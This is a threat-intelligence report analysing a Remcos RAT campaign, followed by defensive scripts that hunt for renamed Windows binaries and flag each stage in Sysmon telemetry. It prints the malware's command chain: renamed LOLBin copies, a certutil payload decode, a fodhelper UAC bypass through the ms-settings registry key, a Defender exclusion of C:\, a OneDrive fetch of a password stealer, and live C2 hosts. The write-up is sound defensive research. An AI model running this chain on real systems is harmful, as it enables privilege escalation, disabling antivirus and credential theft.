Revealing LOTL Techniques Used by An Active Remcos Malware Campaign

Weekly Threat Intelligence Report

Date: June 10, 2024

Prepared by: David Brunsdon, Threat Intelligence - Security Engineer, HYAS

This article continues last week's research into an ongoing campaign using the Remcos remote access trojan. The attack appears to originate in Nigeria and uses Lithuanian infrastructure. This week we look deeper into the behavior of the malware itself to see what we can learn.

This article illustrates how the malware uses several "living off the land" techniques, in which binaries that ship with the operating system are used to carry out and disguise malicious activity. Relying on files already present on Windows means no additional tooling has to be dropped on the device, so there is less for security products to block or flag as malicious.

In this research we examine:

  • How the malware attempts to hide its actions from EDR by making renamed copies of Windows binaries with extrac32.exe.
  • How the malware attempts to bypass User Account Control (UAC).
  • How it decodes a payload which then downloads an additional credential-stealing tool from OneDrive.

At HYAS we are constantly detonating malware, from which we collect all sorts of telemetry such as external communications, file creations and modifications, registry changes, and other commands run in the environment. This data is used automatically in HYAS Protect to provide high-efficacy protective DNS, and is also available for manual threat intelligence research in the HYAS Insight threat intelligence platform.

Hiding cmd.exe usage

One of the first processes executed by the malware uses extrac32.exe, a tool included in Windows for extracting files from cabinet (.cab) archives. The executable has a command line switch (/C) which instead copies a single file to a new destination and filename. In the case of this malware, it takes cmd.exe and creates a copy called alpha.exe:

C:\Windows\System32\extrac32 /C /Y C:\Windows\System32\cmd.exe "C:\Users\Public\alpha.exe"

Now that alpha.exe exists it is used in place of cmd.exe, which may evade detections keyed on the process name or image path cmd.exe. Note that extrac32 /C makes a byte-for-byte copy, so the file's hash and its PE version information (the OriginalFileName field that Sysmon and many EDRs record) still identify it as cmd.exe; detections built on those fields are unaffected by the rename.

Assembling the Tools

The malware then uses alpha.exe to launch further extrac32 processes, making renamed copies of several other binaries commonly used in living off the land techniques.

C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe

Next, kn.exe is created from certutil.exe, the Windows certificate utility, which among its many capabilities can encode and decode files and download content from the Internet.

Similarly, ger.exe is created from reg.exe, which allows keys and values in the Windows registry to be read and edited from the command line.

C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\reg.exe "C:\Users\Public\ger.exe"

Later, xkn.exe is created from powershell.exe so that PowerShell scripting can be used.

C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Users\Public\xkn.exe"

And finally per.exe is copied from fodhelper.exe, an auto-elevating Windows binary that can be abused for privilege escalation by bypassing User Account Control (UAC). Unlike the other copies, this one is written into C:\Windows\System32 rather than C:\Users\Public.

C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\fodhelper.exe "C:\Windows\System32\per.exe"

Living off the Land Tools Identified:

  • extrac32.exe, used as-is to make the copies below
  • cmd.exe, copied to C:\Users\Public\alpha.exe
  • certutil.exe, copied to C:\Users\Public\kn.exe
  • reg.exe, copied to C:\Users\Public\ger.exe
  • powershell.exe, copied to C:\Users\Public\xkn.exe
  • fodhelper.exe, copied to C:\Windows\System32\per.exe
  • taskkill.exe, used as-is

Each one of these Windows executables plays a role in embedding the spyware into the victim machine.
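Because extrac32 /C produces an exact copy, a renamed LOLBin can be found on disk by content hash alone. The following hunting script is an added example written for this article, not code from the HYAS report or from the malware: it hashes the binaries the campaign copied from their canonical System32 locations, then sweeps user-writable directories for files with a matching hash but a different name. The directory lists and the file names are assumptions for a default Windows install; adjust them for your environment.

```python
"""Hunt for renamed copies of Windows system binaries (added example).

extrac32 /C copies bytes verbatim, so alpha.exe made from cmd.exe keeps
cmd.exe's SHA-256. Build reference hashes from the canonical binaries, then
report any file in the swept directories whose hash matches a watched binary
but whose name does not.
"""
import hashlib
import os
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

# Binaries the campaign copied (from the report). Assumed to live in the
# default System32 / WindowsPowerShell locations listed in main() below.
WATCHED_BINARIES = ["cmd.exe", "certutil.exe", "reg.exe", "powershell.exe", "fodhelper.exe"]


def sha256_file(path: Path) -> str:
    """SHA-256 of a file, streamed in 1 MiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_reference_hashes(system_dirs: Iterable[Path],
                           names: Iterable[str] = WATCHED_BINARIES) -> Dict[str, str]:
    """Map sha256 -> canonical lowercase name for each watched binary found."""
    reference: Dict[str, str] = {}
    for directory in system_dirs:
        for name in names:
            candidate = Path(directory) / name
            if candidate.is_file():
                reference[sha256_file(candidate)] = name.lower()
    return reference


def find_renamed_copies(sweep_dirs: Iterable[Path],
                        reference: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (path, original_name) for files whose content matches a watched
    system binary but whose file name differs from the canonical one."""
    hits: List[Tuple[str, str]] = []
    for directory in sweep_dirs:
        for root, _dirs, files in os.walk(directory):
            for filename in files:
                path = Path(root) / filename
                try:
                    digest = sha256_file(path)
                except OSError:
                    continue  # unreadable or vanished file; skip it
                original = reference.get(digest)
                if original and filename.lower() != original:
                    hits.append((str(path), original))
    return hits


if __name__ == "__main__":
    # Assumed default locations; C:\Users\Public and %TEMP% are where this
    # campaign staged its copies.
    system_dirs = [Path(r"C:\Windows\System32"),
                   Path(r"C:\Windows\System32\WindowsPowerShell\v1.0")]
    sweep_dirs = [Path(r"C:\Users\Public"),
                  Path(os.environ.get("TEMP", r"C:\Windows\Temp"))]
    for path, original in find_renamed_copies(sweep_dirs, build_reference_hashes(system_dirs)):
        print(f"{path} is a renamed copy of {original}")
```

A hash match only catches unmodified copies; an attacker who patches a single byte defeats it. For that case, compare the OriginalFilename field of the file's VERSIONINFO resource against its on-disk name, which is the same check Sysmon exposes at process creation time.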

Timeline

When the malware is detonated, the following sequence occurs:

1. C:\Users\Public\alpha /c C:\Users\Public\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO767575.cmd" "C:\Users\Public\Ping_c.mp4"

a. certutil.exe (as kn.exe) hex-decodes the dropped file PO767575.cmd into Ping_c.mp4. This file is later renamed Ping_c.pif and becomes the payload, which is also used to download additional files.

2. C:\Users\Public\alpha /c C:\Users\Public\xkn -WindowStyle hidden -Command "C:\Users\Public\alpha /c C:\Users\Public\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\Users\Public\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "

a. PowerShell (xkn.exe) launches cmd.exe (alpha.exe), which runs reg.exe (ger.exe) to set the default value of HKCU\Software\Classes\ms-settings\shell\open\command to a nested PowerShell command.

b. This registry key is what fodhelper.exe consults, and is used later to bypass UAC.

c. The nested PowerShell command runs Add-MpPreference -ExclusionPath C:\, which excludes the entire C: drive from Microsoft Defender scanning. Add-MpPreference requires administrative rights, which is why the command is staged in the registry for the elevated fodhelper context rather than run directly.

3. alpha /c taskkill /F /IM SystemSettings.exe

a. Killing SystemSettings.exe with taskkill is most likely intended to suppress the Settings app window or error dialogs that fodhelper would otherwise bring up in front of the user.

4. C:\Windows\System32\per.exe

a. fodhelper.exe (per.exe) is executed with the registry key in place to trigger the UAC bypass. fodhelper.exe is an auto-elevating binary, so for a user in the Administrators group it starts with a high-integrity token without a UAC prompt; it then resolves the ms-settings protocol handler from HKCU\Software\Classes, where the malware's command is waiting, and that command runs in the elevated context.

b. For more information on how the UAC bypass works, see this article: https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/

5. After some additional use of certutil, Ping_c.mp4 is renamed Ping_c.pif and executed, initiating network communications. Windows treats a .pif file containing a PE image as an executable, so the rename makes the decoded payload runnable while the .mp4 extension disguised it until then.

6. A file is downloaded from a onedrive.live.com URL with a GET request:

a. GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1

b. The downloaded file is named 233_Zlnehhbbwhz.

7. The downloaded payload appears to contain a version of ChromePass.exe, a NirSoft tool that reads the passwords stored by Chrome and writes them to a file. (https://www.nirsoft.net/utils/chromepass.html)

With the staged payloads installed, encrypted communication began with two C2 domains, both hosted on free dynamic DNS services:
a. taker202.ddns.net:3017
b. taker202.duckdns.org:5033

With C2 communication engaged, the threat actor now has Remcos (and potentially more) running on the victim device. They’re able to remotely control the device, view the camera, listen to the microphone, install applications, exfiltrate data, and more.
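The tool-assembly stage and the timeline above together give a small set of behaviours that telemetry can catch regardless of what the copied binaries are named. The detection logic below is an added example written for this article, not code from HYAS or from the malware. It runs over hand-built sample events in the shape of Sysmon process-creation (Event ID 1) and registry-value-set (Event ID 13) records, built from the command lines in this report; the OriginalFileName values are what each binary's PE version resource carries and survive an extrac32 /C copy, and the SID and the benign notepad event are made up. Field names follow Sysmon; everything else is an assumption of the example.

```python
"""Detection rules for the LOTL chain in this report, exercised over
constructed telemetry (added example, not from the HYAS report).

Rules: a process whose PE OriginalFileName names a watched binary but whose
image name differs (renamed LOLBin); extrac32 /C copying a System32 binary
to another name or location; certutil -decode/-decodehex under a renamed
image; a write to the ms-settings\shell\open\command handler key (fodhelper
UAC bypass staging); a Defender exclusion being added; and taskkill against
SystemSettings.exe.
"""
import re
from typing import Dict, List

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Binaries the campaign copied; OriginalFileName of a copy still names them.
WATCHED = {"cmd.exe", "certutil.exe", "reg.exe", "powershell.exe", "fodhelper.exe"}
EXTRAC32_COPY = re.compile(r'extrac32(?:\.exe)?\s+/c(?:\s+/y)?\s+"?([^"\s]+)"?\s+"?([^"]+?)"?\s*$', re.I)
MS_SETTINGS_KEY = r"\software\classes\ms-settings\shell\open\command"
DEFENDER_EXCL = re.compile(r"add-mppreference\b.*-exclusion(?:path|process|extension)", re.I)

# Constructed sample events built from the command lines in the report.
# The SID is invented; the last event is a benign control.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\extrac32.exe", "OriginalFileName": "extrac32.exe",
     "CommandLine": r'C:\Windows\System32\extrac32 /C /Y C:\Windows\System32\cmd.exe "C:\Users\Public\alpha.exe"'},
    {"EventID": "1", "Image": r"C:\Users\Public\alpha.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"C:\Users\Public\alpha /c extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe"},
    {"EventID": "1", "Image": r"C:\Users\Public\kn.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r'C:\Users\Public\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PO767575.cmd" "C:\Users\Public\Ping_c.mp4"'},
    {"EventID": "13", "Image": r"C:\Users\Public\ger.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Classes\ms-settings\shell\open\command\(Default)",
     "Details": r'C:\Users\Public\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"'},
    {"EventID": "1", "Image": r"C:\Users\Public\alpha.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"alpha /c taskkill /F /IM SystemSettings.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\per.exe", "OriginalFileName": "FodHelper.EXE",
     "CommandLine": r"C:\Windows\System32\per.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"C:\Windows\System32\notepad.exe"},
]


def _base(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def evaluate(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply every rule to every event; return one hit per (event, rule)."""
    hits: List[Dict[str, object]] = []

    def hit(index: int, rule: str, detail: str) -> None:
        hits.append({"event_index": index, "rule": rule, "detail": detail})

    for i, ev in enumerate(events):
        cmd = ev.get("CommandLine", "")
        details = ev.get("Details", "")
        orig = ev.get("OriginalFileName", "").lower()
        image = _base(ev.get("Image", ""))
        if ev.get("EventID") == "1":
            if orig in WATCHED and orig != image:
                hit(i, "renamed_lolbin", f"{image} has OriginalFileName {orig}")
            m = EXTRAC32_COPY.search(cmd)
            if m:
                src, dst = m.group(1), m.group(2)
                if _in_system_dir(src) and (_base(src) != _base(dst) or not _in_system_dir(dst)):
                    hit(i, "extrac32_copy", f"{src} -> {dst}")
            if orig == "certutil.exe" and re.search(r"\s-decode(?:hex)?\b", cmd, re.I):
                hit(i, "certutil_decode", cmd)
            if re.search(r"taskkill\b.*\bsystemsettings\.exe", cmd, re.I):
                hit(i, "taskkill_systemsettings", cmd)
        elif ev.get("EventID") == "13":
            if MS_SETTINGS_KEY in ev.get("TargetObject", "").lower():
                hit(i, "ms_settings_hijack", details)
        # The exclusion command can appear on a command line or inside a
        # registry value staged for later execution, so check both.
        if DEFENDER_EXCL.search(cmd) or DEFENDER_EXCL.search(details):
            hit(i, "defender_exclusion", cmd or details)
    return hits


if __name__ == "__main__":
    for h in evaluate(SAMPLE_EVENTS):
        print(f"event {h['event_index']}: {h['rule']}: {h['detail']}")
```

The renamed_lolbin rule is the one that matters most here: it fires on alpha.exe, kn.exe and per.exe without any knowledge of those names, because the rename does not touch the version resource. The other rules are behavioural and catch each stage of the chain even when it is run from an unrenamed binary.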

This analysis demonstrates how malware, and the threat actors behind it, employ a variety of techniques to circumvent detection. To protect an organization, a robust, multi-layered cybersecurity program should be in place to detect the many techniques and tactics that can be used by malware, or simply by threat actors with "hands on the keyboard".

Malware Mystery

A question to my esteemed colleagues and peers: as I was conducting this research, I discovered something that I couldn't explain. Within the malware processes was the creation and deletion of critical Windows folders. These folders would already exist on a Windows PC so they couldn't be created, and although the actions appear destructive, surely an "Access Denied" error would occur upon the deletion attempt.

Early in the malware process tree:
C:\Users\Public\alpha /c mkdir "C:\Windows "
C:\Users\Public\alpha /c mkdir "C:\Windows \System32"

End of the malware process tree:
C:\Users\Public\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha /c rmdir "C:\Windows \"

At first glance it looks extremely destructive. But we know that you can't delete Windows while running Windows, right? As far as I can tell, a) that doesn't make sense and b) it wouldn't succeed. After all, it makes no sense to install spyware on a computer and then destroy it. My best guess is that it must be deleting something in those folders, such as the contents of the log directories. But what a crazy way to do it.

What do you think?

Read the previous report:
Threat Intel Report - June 3, 2024


Disclaimer: This Threat Intelligence Report is provided “as is” and for informational purposes only. HYAS disclaims all warranties, express or implied, regarding the report’s completeness, accuracy, or reliability. You are solely responsible for exercising your own due diligence when accessing and using this Report's information. The analyses expressed in this Report reflect our current understanding of available information based on our independent research using the HYAS Insight platform. The Report’s inclusion of any companies, organizations, or ASNs does not imply any wrongdoing on their part; it is simply an indication of where digital threat activities have been observed. HYAS reserves the right to update the Report as additional information is made known to us.
